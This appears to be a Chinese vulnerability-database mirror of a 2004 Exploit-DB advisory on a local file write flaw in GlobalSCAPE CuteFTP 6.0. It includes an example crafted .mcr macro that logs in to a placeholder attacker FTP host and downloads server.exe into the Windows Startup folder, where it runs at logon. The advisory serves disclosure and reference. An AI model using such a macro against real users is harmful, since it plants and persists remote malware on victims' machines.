GlobalScape – CuteFTP macros ‘.mcr’ Local File Write

GlobalScape – CuteFTP macros ‘.mcr’ Local File Write

漏洞ID 1054699 漏洞类型
发布时间 2004-09-28 更新时间 2004-09-28
图片[1]-GlobalScape – CuteFTP macros ‘.mcr’ Local File Write-安全小百科CVE编号 N/A
图片[2]-GlobalScape – CuteFTP macros ‘.mcr’ Local File Write-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/560
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: [email protected]
web: http://www.prohack.net
*/

--The bug:

Atacker can create a crafted CuteFTP macro (*.mcr),
and when its loaded in the target computer, it can download the Arbitrary file
into the target users startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:Documents and SettingsAll UsersStart MenuProgramsStartup


# milw0rm.com [2004-09-28]

相关推荐: NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability

NAI PGP Keyserver Web Administration Interface Authentication Bypassing Vulnerability 漏洞ID 1102900 漏洞类型 Configuration Error 发布时间 2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享